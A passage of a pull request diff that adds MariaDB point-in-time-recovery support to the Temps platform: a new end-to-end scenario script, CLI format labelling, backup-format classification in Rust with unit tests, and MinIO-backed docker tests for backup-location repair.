### PR TITLE
fix(mariadb): make MariaDB backup/PITR reachable, correct, and safe end-to-end

### DIFF
--- a/.github/scripts/run-temps-e2e-shard.sh
+++ b/.github/scripts/run-temps-e2e-shard.sh
@@ -55,6 +55,7 @@ case "$SHARD" in
     run_scenario mongodb-restore-scenario
     run_scenario s3-restore-scenario
     run_scenario mariadb-restore-scenario
+    run_scenario mariadb-pitr-scenario
     run_scenario pg-upgrade-scenario --registry "$REGISTRY" --upgrade-timeout 900000
     ;;
   edge)

--- a/apps/temps-cli/src/commands/services/restore.ts
+++ b/apps/temps-cli/src/commands/services/restore.ts
@@ -74,6 +74,13 @@ interface RestoreRunShowOptions {
   json?: boolean
 }
 
+// Backup formats that support point-in-time recovery. "walg" is Postgres's
+// continuous-archive format; "mariadb_physical" is the MariaDB analog (a
+// mariadb-backup physical base backup with archived binlogs for replay).
+// Anything else (pg_dump, mariadb_dump, unknown/empty) is a logical/one-shot
+// backup and cannot be replayed to an arbitrary point in time.
+const PITR_CAPABLE_FORMATS = new Set(['walg', 'mariadb_physical'])
+
 // ---- Actions -------------------------------------------------------------
 
 async function showCapsAction(options: ShowCapsOptions): Promise<void> {
@@ -157,12 +164,12 @@ async function listBackupsAction(options: ListBackupsOptions): Promise<void> {
       color: (value, r) => typeof r.size_bytes === 'number' && r.size_bytes != null ? value : colors.muted(value),
     },
     {
-      header: 'Location',
-      accessor: (r) =>
-        (r.location ?? '').startsWith('s3://')
-          ? 'WAL-G'
-          : 'legacy',
-      color: (value, r) => (r.location ?? '').startsWith('s3://') ? colors.success(value) : colors.muted(value),
+      header: 'Format',
+      accessor: (r) => r.format || 'unknown',
+      color: (value, r) =>
+        r.format && PITR_CAPABLE_FORMATS.has(r.format)
+          ? colors.success(value)
+          : colors.muted(value),
     },
     {
       header: 'Created',
@@ -548,7 +555,7 @@ export function registerRestoreCommands(services: Command): void {
     )
     .option(
       '--pitr <iso>',
-      'Point-in-time recovery target, ISO 8601 timestamp (requires WAL-G backup). Combine with --new-service to route PITR into a new service.',
+      'Point-in-time recovery target, ISO 8601 timestamp (requires a PITR-capable backup). Combine with --new-service to route PITR into a new service.',
     )
     .option('-y, --yes', 'Skip confirmation')
     .option('--no-wait', 'Return immediately without polling run status')

--- a/apps/temps-e2e/src/commands/mariadb-pitr-scenario.ts
+++ b/apps/temps-e2e/src/commands/mariadb-pitr-scenario.ts
@@ -1,0 +1,582 @@
+// SPDX-FileCopyrightText: 2024-2026 Temps Contributors
+// SPDX-License-Identifier: MIT OR Apache-2.0
+
+/**
+ * MariaDB point-in-time recovery against a live Temps instance.
+ *
+ * `mariadb-restore-scenario` already proves plain in-place restore. This
+ * scenario proves the PITR-specific path: `MariaDbService::restore_pitr`
+ * (`crates/temps-providers/src/externalsvc/mariadb.rs`), which downloads a
+ * physical `mariadb-backup` base, replays archived binlog segments up to a
+ * `recovery_target_time`, and stops before crossing it.
+ *
+ * Unlike managed Postgres (which archives WAL on every container via a fixed
+ * `archive_timeout`, see `pitr-scenario.ts`), MariaDB binlog archiving is
+ * driven by `HealthMonitor`'s periodic MariaDB check
+ * (`crates/temps-providers/src/health_monitor.rs`), and only runs at all for
+ * a service once an ENABLED `backup_schedules` row covers it with an
+ * `s3_source_id` (`find_s3_source_for_service`). There is no HTTP endpoint to
+ * trigger binlog archiving on demand, so this scenario creates a real backup
+ * schedule (with a `schedule_expression` that never actually fires — we don't
+ * need the schedule's own cron to run, only the row to exist and be enabled)
+ * and waits out a real archive cycle.
+ *
+ * Flow:
+ *   1. Provision a real standalone MariaDB service with
+ *      `binlog_archive_interval: "1m"` so the health-monitor's gate clears
+ *      quickly instead of the 5m default.
+ *   2. Create an S3 source (MinIO) and a real backup schedule covering this
+ *      service, enabled — this is what unlocks binlog archiving for it.
+ *   3. Insert 3 "T1" rows via `docker exec mariadb`.
+ *   4. Trigger a real ad-hoc physical backup (`mariadb_physical`, auto-
+ *      selected because `mariadb-backup`/`mariadb-binlog` are present in the
+ *      stock `mariadb:lts` image) and poll it to `completed`. This is the
+ *      PITR base.
+ *   5. Wait out a real binlog-archive cycle so T1's segment lands in S3
+ *      (`HealthMonitor` ticks every `poll_interval_secs` (30s default) and
+ *      only archives once `binlog_archive_interval` (60s here) has elapsed
+ *      since the last archive for this service — 100s covers both with
+ *      margin).
+ *   6. Capture the PITR recovery-target timestamp (after T1, before T2).
+ *   7. Insert 2 "T2" rows the restore must NOT include.
+ *   8. Start an in-place PITR restore (`mode: "pitr"`, `to_new_service:
+ *      false`) targeting the captured timestamp, and poll to `completed`.
+ *   9. Read back via the read-only data-browser API: assert the 3 T1 rows
+ *      are present with correct values AND the 2 T2 rows are absent.
+ *  10. Teardown (backup schedule, S3 source, service).
+ *
+ * Needs:
+ * - MinIO running (from docker-compose.e2e.yml, port 9092).
+ * - A bucket named `temps-e2e-backups` already created in MinIO.
+ * - Docker accessible from the host running this test (for the mariadb exec).
+ */
+
+import {
+  createS3Source,
+  deleteS3Source,
+  createBackupSchedule,
+  attachScheduleServices,
+  deleteBackupSchedule,
+  runExternalServiceBackup,
+  listExternalServiceBackups,
+  getBackup,
+  startRestore,
+  getRestoreRun,
+  readEntityRows,
+  getService,
+} from '@temps-sdk/api'
+import { makeClient, resolveConfig, unwrap } from '../lib/client.ts'
+import {
+  createE2eService,
+  pollUntil,
+  teardown,
+  makeRunId,
+  sleep,
+} from '../lib/flows.ts'
+
+export interface MariadbPitrScenarioOptions {
+  minioEndpoint?: string
+  minioBucket?: string
+  keep?: boolean
+  json?: boolean
+  connection: { url?: string; apiKey?: string }
+}
+
+interface StepLog {
+  step: string
+  ok: boolean
+  detail?: string
+  ms?: number
+}
+
+interface MariadbPitrScenarioResult {
+  runId: string
+  ok: boolean
+  steps: StepLog[]
+}
+
+const MARIADB_DATABASE = 'e2etest'
+const MARIADB_TABLE = 'pitr_probe'
+
+interface ProbeRow {
+  id: number
+  label: string
+  value: number
+}
+
+// T1 rows: inserted before the PITR target time, must survive the restore.
+const T1_ROWS: ProbeRow[] = [
+  { id: 1, label: 't1-alpha', value: 100 },
+  { id: 2, label: 't1-beta', value: 200 },
+  { id: 3, label: 't1-gamma', value: 300 },
+]
+
+// T2 rows: inserted after the PITR target time, must be ABSENT after restore.
+const T2_ROWS: ProbeRow[] = [
+  { id: 4, label: 't2-delta', value: 400 },
+  { id: 5, label: 't2-epsilon', value: 500 },
+]
+
+function sqlQuote(value: string): string {
+  return `'${value.replace(/'/g, "''")}'`
+}
+
+async function mariadbExec(
+  containerName: string,
+  rootPassword: string,
+  database: string,
+  script: string,
+): Promise<string> {
+  const proc = Bun.spawn(
+    [
+      'docker',
+      'exec',
+      containerName,
+      'mariadb',
+      '-uroot',
+      `-p${rootPassword}`,
+      '-N',
+      '-B',
+      '-e',
+      script,
+      database,
+    ],
+    { stdout: 'pipe', stderr: 'pipe' },
+  )
+  const [stdout, stderr, code] = await Promise.all([
+    new Response(proc.stdout).text(),
+    new Response(proc.stderr).text(),
+    proc.exited,
+  ])
+  if (code !== 0) {
+    throw new Error(
+      `mariadb exec in '${containerName}' exited ${code}.\nstdout: ${stdout.trim()}\nstderr: ${stderr.trim()}`,
+    )
+  }
+  return stdout.trim()
+}
+
+async function insertRows(
+  containerName: string,
+  rootPassword: string,
+  rows: ProbeRow[],
+): Promise<void> {
+  const values = rows
+    .map((r) => `(${r.id}, ${sqlQuote(r.label)}, ${r.value})`)
+    .join(', ')
+  const script =
+    `CREATE TABLE IF NOT EXISTS ${MARIADB_TABLE} ` +
+    `(id INT PRIMARY KEY, label VARCHAR(255) NOT NULL, value INT NOT NULL); ` +
+    `INSERT INTO ${MARIADB_TABLE} (id, label, value) VALUES ${values};`
+  await mariadbExec(containerName, rootPassword, MARIADB_DATABASE, script)
+}
+
+async function countRowsByIds(
+  containerName: string,
+  rootPassword: string,
+  ids: number[],
+): Promise<number> {
+  const script = `SELECT COUNT(*) FROM ${MARIADB_TABLE} WHERE id IN (${ids.join(',')});`
+  const out = await mariadbExec(containerName, rootPassword, MARIADB_DATABASE, script)
+  const n = parseInt(out, 10)
+  if (isNaN(n)) throw new Error(`SELECT COUNT(*) returned non-numeric: "${out}"`)
+  return n
+}
+
+async function readTableViaApi(
+  client: Parameters<typeof readEntityRows>[0]['client'],
+  serviceId: number,
+  limit = 50,
+): Promise<Array<Record<string, unknown>>> {
+  const result = unwrap(
+    await readEntityRows({
+      client,
+      path: { service_id: serviceId, path: MARIADB_DATABASE, entity: MARIADB_TABLE },
+      query: { limit, sort_by: 'id', sort_order: 'asc' },
+    }),
+    'readEntityRows(mariadb)',
+  )
+  return (result.rows ?? []) as Array<Record<string, unknown>>
+}
+
+export async function mariadbPitrScenarioCommand(
+  opts: MariadbPitrScenarioOptions,
+): Promise<void> {
+  const cfg = resolveConfig(opts.connection)
+  const client = makeClient(cfg)
+  const json = !!opts.json
+  const log = (msg: string) => {
+    if (!json) process.stderr.write(msg + '\n')
+  }
+
+  if (!json) log(`Temps MariaDB PITR scenario  ->  ${cfg.url}`)
+
+  const minioEndpoint = opts.minioEndpoint ?? 'http://localhost:9092'
+  const minioBucket = opts.minioBucket ?? 'temps-e2e-backups'
+
+  const runId = makeRunId(Date.now())
+  const steps: StepLog[] = []
+  const step = async <T>(name: string, fn: () => Promise<T>): Promise<T> => {
+    const t0 = performance.now()
+    log(`\n▶ ${name}`)
+    try {
+      const r = await fn()
+      const ms = performance.now() - t0
+      steps.push({ step: name, ok: true, ms })
+      log(`  ✓ ${name} (${(ms / 1000).toFixed(1)}s)`)
+      return r
+    } catch (e) {
+      const ms = performance.now() - t0
+      steps.push({ step: name, ok: false, detail: (e as Error).message, ms })
+      log(`  ✗ ${name}: ${(e as Error).message}`)
+      throw e
+    }
+  }
+
+  const serviceIds: number[] = []
+  let s3SourceId: number | undefined
+  let scheduleId: number | undefined
+  let mariadbContainerName: string | undefined
+  let mariadbRootPassword: string | undefined
+  let pitrTargetTime: string | undefined
+
+  try {
+    // ── Step 1: provision MariaDB with fast binlog archiving ──────────────
+    const svcName = `${runId}-mariadb-pitr`
+    const service = await step(
+      'provision a real standalone MariaDB service (binlog_archive_interval=1m)',
+      () =>
+        createE2eService(client, {
+          name: svcName,
+          serviceType: 'mariadb',
+          parameters: {
+            database: MARIADB_DATABASE,
+            username: 'app',
+            binlog_archive_interval: '1m',
+          },
+        }),
+    )
+    serviceIds.push(service.id)
+    log(`  service #${service.id}`)
+
+    unwrap(await getService({ client, path: { id: service.id } }), 'getService')
+
+    // Container name is derived as `mariadb-{name}` (see
+    // `MariaDbService::get_container_name` in externalsvc/mariadb.rs).
+    mariadbContainerName = `mariadb-${svcName}`
+
+    mariadbRootPassword = await (async () => {
+      const proc = Bun.spawn(
+        [
+          'docker',
+          'inspect',
+          '--format',
+          '{{range .Config.Env}}{{println .}}{{end}}',
+          mariadbContainerName!,
+        ],
+        { stdout: 'pipe', stderr: 'pipe' },
+      )
+      const [out, , code] = await Promise.all([
+        new Response(proc.stdout).text(),
+        new Response(proc.stderr).text(),
+        proc.exited,
+      ])
+      if (code !== 0) throw new Error(`docker inspect failed for container ${mariadbContainerName}`)
+      for (const line of out.split('\n')) {
+        if (line.startsWith('MARIADB_ROOT_PASSWORD=')) {
+          return line.slice('MARIADB_ROOT_PASSWORD='.length).trim()
+        }
+      }
+      throw new Error(
+        `MARIADB_ROOT_PASSWORD not found in container env vars for ${mariadbContainerName}`,
+      )
+    })()
+
+    log(`  container: ${mariadbContainerName}`)
+
+    // ── Step 2: S3 source + backup schedule (unlocks binlog archiving) ────
+    const source = await step('create an S3 source pointed at the local MinIO', async () => {
+      return unwrap(
+        await createS3Source({
+          client,
+          body: {
+            name: `${runId}-minio-mariadb-pitr`,
+            bucket_name: minioBucket,
+            bucket_path: runId,
+            access_key_id: 'minioadmin',
+            secret_key: 'minioadmin',
+            region: 'us-east-1',
+            endpoint: minioEndpoint,
+            force_path_style: true,
+            is_default: false,
+          },
+        }),
+        'createS3Source',
+      )
+    })
+    s3SourceId = source.id
+    log(`  s3 source #${source.id}`)
+
+    // `HealthMonitor::find_s3_source_for_service` only requires an ENABLED
+    // schedule covering this service with an `s3_source_id` -- it does not
+    // need the schedule's own cron to ever fire. Use a `schedule_expression`
+    // that can never match (Feb 31st does not exist) so this schedule never
+    // triggers its own backup run during the test. The schedule parser is
+    // 6-field (seconds-first: sec min hour day month weekday).
+    const schedule = await step(
+      'create an enabled backup schedule covering this service (unlocks binlog archiving)',
+      async () => {
+        const created = unwrap(
+          await createBackupSchedule({
+            client,
+            body: {
+              name: `${runId}-mariadb-pitr-schedule`,
+              backup_type: 'full',
+              schedule_expression: '0 0 0 31 2 *',
+              retention_period: 1,
+              enabled: true,
+              target_all_services: false,
+              s3_source_id: source.id,
+              tags: [],
+            },
+          }),
+          'createBackupSchedule',
+        )
+        unwrap(
+          await attachScheduleServices({
+            client,
+            path: { id: created.id },
+            body: { service_ids: [service.id] },
+          }),
+          'attachScheduleServices',
+        )
+        return created
+      },
+    )
+    scheduleId = schedule.id
+    log(`  backup schedule #${schedule.id}`)
+
+    // ── Step 3: insert T1 rows ─────────────────────────────────────────────
+    await step('insert 3 T1 rows via docker exec mariadb', async () => {
+      await insertRows(mariadbContainerName!, mariadbRootPassword!, T1_ROWS)
+      const count = await countRowsByIds(
+        mariadbContainerName!,
+        mariadbRootPassword!,
+        T1_ROWS.map((r) => r.id),
+      )
+      if (count !== 3) {
+        throw new Error(`expected 3 T1 rows, found ${count}`)
+      }
+    })
+
+    // ── Step 4: ad-hoc physical backup (the PITR base) ─────────────────────
+    await step(
+      'trigger a real MariaDB physical backup (the PITR base)',
+      async () => {
+        unwrap(
+          await runExternalServiceBackup({
+            client,
+            path: { id: service.id },
+            body: { s3_source_id: source.id, backup_type: 'full' },
+          }),
+          'runExternalServiceBackup',
+        )
+      },
+    )
+
+    const backupEntry = await step('poll the backup to a real completed state', async () => {
+      const list = await pollUntil(
+        async () =>
+          unwrap(
+            await listExternalServiceBackups({
+              client,
+              path: { service_id: service.id },
+              query: { page: 1, page_size: 5 },
+            }),
+            'listExternalServiceBackups',
+          ),
+        (l) => l.backups.length > 0,
+        { timeoutMs: 60_000, intervalMs: 2000, label: 'backup row to appear' },
+      )
+      const entry = list.backups[0]!
+      const finalBackup = await pollUntil(
+        async () => unwrap(await getBackup({ client, path: { id: entry.backup_id } }), 'getBackup'),
+        (b) => b.state === 'completed' || b.state === 'failed',
+        {
+          timeoutMs: 180_000,
+          intervalMs: 3000,
+          onPoll: (b) => log(`    ...${b.state}`),
+          label: 'backup to reach a terminal state',
+        },
+      )
+      if (finalBackup.state !== 'completed') {
+        throw new Error(
+          `backup ${entry.backup_id} ended in state "${finalBackup.state}": ${finalBackup.error_message}`,
+        )
+      }
+      return entry
+    })
+    log(`  backup #${backupEntry.id} (backup_id=${backupEntry.backup_id})`)
+
+    // ── Step 5: wait out a real binlog-archive cycle ───────────────────────
+    // `HealthMonitor` polls every `poll_interval_secs` (30s default) and only
+    // archives once `binlog_archive_interval` (60s, set above) has elapsed
+    // since the last archive attempt for this service -- 100s covers both
+    // with margin, mirroring `pitr-scenario.ts`'s WAL-archive wait for
+    // managed postgres.
+    await step("wait for T1's binlog segment to be archived (interval + poll margin)", async () => {
+      await sleep(100_000)
+    })
+
+    // ── Step 6: capture the PITR target ────────────────────────────────────
+    pitrTargetTime = await step('capture the PITR recovery-target timestamp (after T1, before T2)', async () => {
+      const iso = new Date().toISOString()
+      log(`  target time: ${iso}`)
+      return iso
+    })
+
+    await step('buffer so T2 is unambiguously after the captured target time', async () => {
+      await sleep(3_000)
+    })
+
+    // ── Step 7: insert T2 rows ──────────────────────────────────────────────
+    await step('insert 2 T2 rows (must be ABSENT after PITR restore)', async () => {
+      await insertRows(mariadbContainerName!, mariadbRootPassword!, T2_ROWS)
+      const count = await countRowsByIds(
+        mariadbContainerName!,
+        mariadbRootPassword!,
+        T2_ROWS.map((r) => r.id),
+      )
+      if (count !== 2) {
+        throw new Error(`expected 2 T2 rows, found ${count}`)
+      }
+    })
+
+    // ── Step 8: start the PITR restore, in place ───────────────────────────
+    const restoreRun = await step(
+      'start an in-place PITR restore to the captured target time',
+      async () => {
+        return unwrap(
+          await startRestore({
+            client,
+            path: { id: service.id },
+            body: {
+              backup_id: backupEntry.id,
+              mode: 'pitr',
+              to_new_service: false,
+              target: { kind: 'time', time: pitrTargetTime! },
+            },
+          }),
+          'startRestore',
+        )
+      },
+    )
+    log(`  restore run #${restoreRun.id}`)
+
+    await step('poll the PITR restore to a real completed state', async () => {
+      const finalRun = await pollUntil(
+        async () => unwrap(await getRestoreRun({ client, path: { id: restoreRun.id } }), 'getRestoreRun'),
+        (r) => r.status === 'completed' || r.status === 'failed',
+        {
+          timeoutMs: 240_000,
+          intervalMs: 3000,
+          onPoll: (r) => log(`    ...${r.status} (${r.phase})`),
+          label: 'PITR restore run to reach a terminal state',
+        },
+      )
+      if (finalRun.status !== 'completed') {
+        throw new Error(
+          `restore run ${restoreRun.id} ended in status "${finalRun.status}": ${finalRun.error_message}`,
+        )
+      }
+    })
+
+    // Give mariadbd a moment to settle after restore before querying.
+    await sleep(3_000)
+
+    // ── Step 9: verify correctness via data-browser API ────────────────────
+    await step(
+      'data-browser API: 3 T1 rows present with correct values, 2 T2 rows absent',
+      async () => {
+        const rows = await readTableViaApi(client, service.id)
+        log(`  data-browser returned ${rows.length} row(s) in table`)
+
+        const byId = new Map<string, Record<string, unknown>>()
+        for (const row of rows) {
+          byId.set(String(row['id']), row)
+        }
+
+        for (const expected of T1_ROWS) {
+          const row = byId.get(String(expected.id))
+          if (!row) {
+            throw new Error(
+              `T1 row id=${expected.id} is MISSING after PITR restore — ` +
+                'restore_pitr did not replay up to the target time',
+            )
+          }
+          const label = row['label'] as string | undefined
+          const value = Number(row['value'])
+          if (label !== expected.label || value !== expected.value) {
+            throw new Error(
+              `T1 row id=${expected.id} has label="${label}" value=${value}, ` +
+                `expected label="${expected.label}" value=${expected.value}`,
+            )
+          }
+          log(`  ✓ T1 row id=${expected.id} present with correct values`)
+        }
+
+        for (const absent of T2_ROWS) {
+          if (byId.has(String(absent.id))) {
+            throw new Error(
+              `T2 row id=${absent.id} is STILL PRESENT after PITR restore — ` +
+                'restore replayed past the target time; this is a correctness failure',
+            )
+          }
+          log(`  ✓ T2 row id=${absent.id} correctly absent`)
+        }
+
+        if (rows.length !== T1_ROWS.length) {
+          throw new Error(
+            `after PITR restore, table has ${rows.length} row(s), ` +
+              `expected exactly ${T1_ROWS.length} (the 3 T1 rows)`,
+          )
+        }
+      },
+    )
+  } catch {
+    // Failure already recorded in `steps`; fall through to teardown.
+  } finally {
+    if (opts.keep) {
+      log(
+        `\n(kept resources: services=${serviceIds.join(',')} s3Source=${s3SourceId ?? '-'} schedule=${scheduleId ?? '-'})`,
+      )
+    } else {
+      if (scheduleId) {
+        await deleteBackupSchedule({ client, path: { id: scheduleId } }).catch(() => undefined)
+      }
+      if (s3SourceId) {
+        await deleteS3Source({ client, path: { id: s3SourceId } }).catch(() => undefined)
+      }
+      const td = await teardown(client, { deployments: [], projectIds: [], serviceIds })
+      log(`\n▶ teardown: removed ${td.deletedServices} service(s)`)
+    }
+  }
+
+  const ok = steps.length > 0 && steps.every((s) => s.ok)
+  const result: MariadbPitrScenarioResult = { runId, ok, steps }
+
+  if (json) {
+    process.stdout.write(JSON.stringify(result, null, 2) + '\n')
+  } else {
+    const total = steps.length
+    const passed = steps.filter((s) => s.ok).length
+    log(`\n${ok ? '✅' : '❌'} MariaDB PITR scenario: ${passed}/${total} steps passed`)
+    if (!ok) {
+      for (const s of steps.filter((s) => !s.ok)) {
+        log(`  ✗ ${s.step}: ${s.detail ?? '(no detail)'}`)
+      }
+    }
+  }
+
+  if (!ok) process.exitCode = 1
+}

--- a/apps/temps-e2e/src/index.ts
+++ b/apps/temps-e2e/src/index.ts
@@ -34,6 +34,7 @@ import { redisRestoreScenarioCommand } from './commands/redis-restore-scenario.t
 import { mongodbRestoreScenarioCommand } from './commands/mongodb-restore-scenario.ts'
 import { pgUpgradeScenarioCommand } from './commands/pg-upgrade-scenario.ts'
 import { mariadbRestoreScenarioCommand } from './commands/mariadb-restore-scenario.ts'
+import { mariadbPitrScenarioCommand } from './commands/mariadb-pitr-scenario.ts'
 import { envVarsScenarioCommand } from './commands/env-vars-scenario.ts'
 import { apiKeyScenarioCommand } from './commands/api-key-scenario.ts'
 import { multinodeJoinScenarioCommand } from './commands/multinode-join-scenario.ts'
@@ -473,6 +474,22 @@ program
   .option('--json', 'machine-readable output')
   .action(async (opts) => {
     await mariadbRestoreScenarioCommand({ ...opts, connection: connection() })
+  })
+
+program
+  .command('mariadb-pitr-scenario')
+  .description(
+    'Point-in-time recovery of a real MariaDB service via MinIO: real mariadb-backup physical base, real backup ' +
+      'schedule to unlock binlog archiving, write T1 rows, wait for their binlog segment to archive, capture a ' +
+      'recovery-target timestamp, write T2 rows, PITR-restore to T1, and prove via the read-only data-browser API ' +
+      'that exactly T1s rows survive',
+  )
+  .option('--minio-endpoint <url>', 'MinIO S3 API endpoint, reachable from the target instance', 'http://localhost:9092')
+  .option('--minio-bucket <name>', 'MinIO bucket to store backups in (must already exist)', 'temps-e2e-backups')
+  .option('--keep', 'do not tear down created resources')
+  .option('--json', 'machine-readable output')
+  .action(async (opts) => {
+    await mariadbPitrScenarioCommand({ ...opts, connection: connection() })
   })
 
 program

--- a/crates/temps-backup/src/services/backup.rs
+++ b/crates/temps-backup/src/services/backup.rs
@@ -58,7 +58,9 @@ fn shell_export_assignment(line: &str) -> Option<String> {
 /// The `engine` hint is used to disambiguate formats that share location
 /// shapes. Object-store backups (s3/rustfs/blob/minio) are always a
 /// bucket-to-bucket mirror — their path has no extension — so we tag them
-/// `"mirror"` when the engine identifies them as such.
+/// `"mirror"` when the engine identifies them as such. MariaDB's logical
+/// dump shares the `.sql.gz` suffix with Postgres's legacy pg_dump, so it
+/// needs the hint too; its physical base (`base.mbstream.gz`) does not.
 fn classify_backup_format(location: &str, engine: Option<&str>) -> Option<String> {
     if location.is_empty() {
         return None;
@@ -74,6 +76,20 @@ fn classify_backup_format(location: &str, engine: Option<&str>) -> Option<String
     // Extension-based classification runs first — it's unambiguous when
     // the file suffix is present, regardless of whether the location is
     // an s3:// URL or a bare key.
+    //
+    // MariaDB's physical base carries a suffix no other engine produces, so
+    // it needs no engine hint.
+    if location.ends_with(".mbstream.gz") {
+        return Some("mariadb_physical".to_string());
+    }
+    // `.sql.gz` is the ONE genuinely ambiguous suffix: Postgres's legacy
+    // pg_dump and MariaDB's logical `dump.sql.gz` share it. Filenames can't
+    // separate them, so the engine hint decides — checked BEFORE the generic
+    // Postgres branch, which would otherwise label every MariaDB dump
+    // `pg_dump` and send the restore planner down the pg_restore path.
+    if location.ends_with(".sql.gz") && engine.is_some_and(|e| e.eq_ignore_ascii_case("mariadb")) {
+        return Some("mariadb_dump".to_string());
+    }
     if location.ends_with(".sql.gz") || location.ends_with(".pgdump.gz") {
         return Some("pg_dump".to_string());
     }
@@ -283,7 +299,13 @@ async fn list_walg_sentinels(
     Ok(out)
 }
 
-/// Find pg_dump / rdb / bson dump objects under a service prefix.
+/// Find pg_dump / rdb / bson / mariadb dump-or-base objects under a service
+/// prefix.
+///
+/// MariaDB is the one engine here with no `/walg/` prefix, so
+/// `scan_s3_for_orphan_backups`'s sentinel pass cannot see it at all: if a
+/// MariaDB suffix is missing from this allowlist, its backups are invisible
+/// to the disaster-recovery scan entirely.
 async fn list_dump_objects(
     s3_client: &aws_sdk_s3::Client,
     bucket: &str,
@@ -313,7 +335,10 @@ async fn list_dump_objects(
                 || key.ends_with(".pgdump.gz")
                 || key.ends_with(".rdb.gz")
                 || key.ends_with(".bson.gz")
-                || key.ends_with(".archive"))
+                || key.ends_with(".archive")
+                // MariaDB physical base (`base.mbstream.gz`). Its logical
+                // dump is already covered by `.sql.gz` above.
+                || key.ends_with(".mbstream.gz"))
             {
                 continue;
             }
@@ -9629,6 +9654,50 @@ mod tests {
         // confidently mislabel.
         let unknown = "s3://bucket/external_services/postgres/svc/some/random/key";
         assert_eq!(classify_backup_format(unknown, Some("postgres")), None);
+    }
+
+    #[test]
+    fn classify_mariadb_physical_base_is_filename_driven() {
+        // `base.mbstream.gz` is produced by no other engine, so it classifies
+        // without an engine hint at all.
+        let loc = "s3://bucket/external_services/mariadb/svc/2026/05/01/uuid/base.mbstream.gz";
+        assert_eq!(
+            classify_backup_format(loc, Some("mariadb")),
+            Some("mariadb_physical".to_string())
+        );
+        assert_eq!(
+            classify_backup_format(loc, None),
+            Some("mariadb_physical".to_string())
+        );
+    }
+
+    #[test]
+    fn classify_mariadb_dump_is_engine_driven_not_filename_driven() {
+        // Regression: MariaDB's logical dump is literally named
+        // `dump.sql.gz`, which the generic `.sql.gz` branch labels `pg_dump`.
+        // Only the engine hint can tell the two apart.
+        let mariadb = "s3://bucket/external_services/mariadb/svc/2026/05/01/uuid/dump.sql.gz";
+        assert_eq!(
+            classify_backup_format(mariadb, Some("mariadb")),
+            Some("mariadb_dump".to_string())
+        );
+        assert_eq!(
+            classify_backup_format(mariadb, Some("MariaDB")),
+            Some("mariadb_dump".to_string()),
+            "engine hint must be matched case-insensitively"
+        );
+
+        // Postgres behavior is unchanged: same suffix, different engine.
+        let postgres = "s3://bucket/external_services/postgres/svc/2026/05/01/uuid/dump.sql.gz";
+        assert_eq!(
+            classify_backup_format(postgres, Some("postgres")),
+            Some("pg_dump".to_string())
+        );
+        // ...including when no hint is available at all.
+        assert_eq!(
+            classify_backup_format(postgres, None),
+            Some("pg_dump".to_string())
+        );
     }
 
     // Simple mock notification service for testing

--- a/crates/temps-backup/src/services/restore.rs
+++ b/crates/temps-backup/src/services/restore.rs
@@ -2615,7 +2615,8 @@ async fn resolve_backup_location_from_s3(
                 || key.ends_with(".pgdump.gz")
                 || key.ends_with(".rdb.gz")
                 || key.ends_with(".bson.gz")
-                || key.ends_with(".archive"))
+                || key.ends_with(".archive")
+                || key.ends_with(".mbstream.gz"))
             {
                 continue;
             }
@@ -3323,5 +3324,268 @@ mod tests {
         // in a stable way across minor versions, so we check behavior via
         // construction success.
         let _client = build_s3_client(&creds);
+    }
+
+    // ---- Backup-location repair against a REAL MinIO (docker-tests) ------
+    //
+    // `resolve_backup_location_from_s3` is the repair path for `backups` rows
+    // whose `s3_location` was never populated. It is private, so it can only be
+    // exercised from in-crate tests — and it is pure S3 listing, so mocking the
+    // S3 client would only test the mock. These tests boot a real MinIO,
+    // seed real objects at the real key shapes the engines write, and call the
+    // real function.
+
+    #[cfg(feature = "docker-tests")]
+    const LOCATION_TEST_MINIO_ACCESS_KEY: &str = "minioadmin";
+    #[cfg(feature = "docker-tests")]
+    const LOCATION_TEST_MINIO_SECRET_KEY: &str = "minioadmin";
+
+    /// RAII reaper for the MinIO container booted by the location-resolution
+    /// tests. Mirrors `tests/mariadb_pitr_e2e.rs::ContainerGuard`; requires a
+    /// multi-thread test runtime because it drives Docker from `Drop`.
+    #[cfg(feature = "docker-tests")]
+    struct MinioGuard {
+        docker: Docker,
+        id: String,
+    }
+
+    #[cfg(feature = "docker-tests")]
+    impl Drop for MinioGuard {
+        fn drop(&mut self) {
+            let docker = self.docker.clone();
+            let id = self.id.clone();
+            let _ = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
+                if let Ok(handle) = tokio::runtime::Handle::try_current() {
+                    tokio::task::block_in_place(|| {
+                        handle.block_on(async {
+                            let _ = docker
+                                .remove_container(
+                                    &id,
+                                    Some(bollard::query_parameters::RemoveContainerOptions {
+                                        force: true,
+                                        v: true,
+                                        ..Default::default()
+                                    }),
+                                )
+                                .await;
+                            eprintln!("Reaped MinIO container {id}");
+                        });
+                    });
+                }
+            }));
+        }
+    }
+
+    /// Boot a MinIO container for the location-resolution tests, returning
+    /// `(host_port, guard)`. Returns `None` (graceful skip) whenever Docker is
+    /// unreachable or the image cannot be pulled — never panics on missing
+    /// infrastructure.
+    #[cfg(feature = "docker-tests")]
+    async fn boot_location_test_minio() -> Option<(u16, MinioGuard)> {
+        use futures::StreamExt;
+        use std::collections::HashMap;
+
+        let docker = match Docker::connect_with_local_defaults() {
+            Ok(d) => d,
+            Err(e) => {
+                eprintln!("Docker unavailable (connect failed), skipping: {e}");
+                return None;
+            }
+        };
+        if let Err(e) = docker.ping().await {
+            eprintln!("Docker socket unreachable (ping failed), skipping: {e}");
+            return None;
+        }
+
+        let mut stream = docker.create_image(
+            Some(bollard::query_parameters::CreateImageOptions {
+                from_image: Some("minio/minio".to_string()),
+                tag: Some("latest".to_string()),
+                ..Default::default()
+            }),
+            None,
+            None,
+        );
+        while let Some(item) = stream.next().await {
+            if let Err(e) = item {
+                eprintln!("Could not pull MinIO image, skipping: {e}");
+                return None;
+            }
+        }
+
+        let port = {
+            use std::net::TcpListener;
+            (9400..9600).find(|&p| TcpListener::bind(("127.0.0.1", p)).is_ok())?
+        };
+        let name = format!("temps-test-restore-loc-minio-{}", uuid::Uuid::new_v4());
+
+        let config = bollard::models::ContainerCreateBody {
+            image: Some("minio/minio:latest".to_string()),
+            cmd: Some(vec!["server".to_string(), "/data".to_string()]),
+            env: Some(vec![
+                format!("MINIO_ROOT_USER={LOCATION_TEST_MINIO_ACCESS_KEY}"),
+                format!("MINIO_ROOT_PASSWORD={LOCATION_TEST_MINIO_SECRET_KEY}"),
+            ]),
+            host_config: Some(bollard::models::HostConfig {
+                port_bindings: Some(HashMap::from([(
+                    "9000/tcp".to_string(),
+                    Some(vec![bollard::models::PortBinding {
+                        host_ip: Some("127.0.0.1".to_string()),
+                        host_port: Some(port.to_string()),
+                    }]),
+                )])),
+                ..Default::default()
+            }),
